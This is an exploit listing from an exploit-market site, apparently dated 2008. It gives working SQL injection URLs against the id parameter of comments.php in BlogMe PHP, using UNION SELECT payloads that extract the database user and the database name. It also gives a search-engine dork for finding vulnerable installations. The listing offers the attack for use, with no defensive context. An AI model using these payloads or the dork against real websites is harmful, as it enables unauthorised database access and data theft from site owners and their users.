[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

BlogMe PHP (comments.php id) SQL Injection Vulnerability

Author
His0k4
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2948
Category
web applications
Date add
02-05-2008
Platform
unsorted
========================================================
BlogMe PHP (comments.php id) SQL Injection Vulnerability
========================================================


###########################################
{+} BlogMe PHP remote SQL injection exploit
{+} Script download : http://www.drumster.net/gamma/downloads/BlogMe11.zip
{+} Founded by : His0k4 [ ALGERIAN HaCkEr ]
{+} Greetz : All friends & muslims HaCkeRs...
{+} Dork : "BlogMe PHP created by Gamma Scripts"
###########################################
{+} Exploit :
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0x71)--
OR :
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,unhex(hex(database())),4,5,6,7--
###########################################



#  0day.today [2024-12-23]  #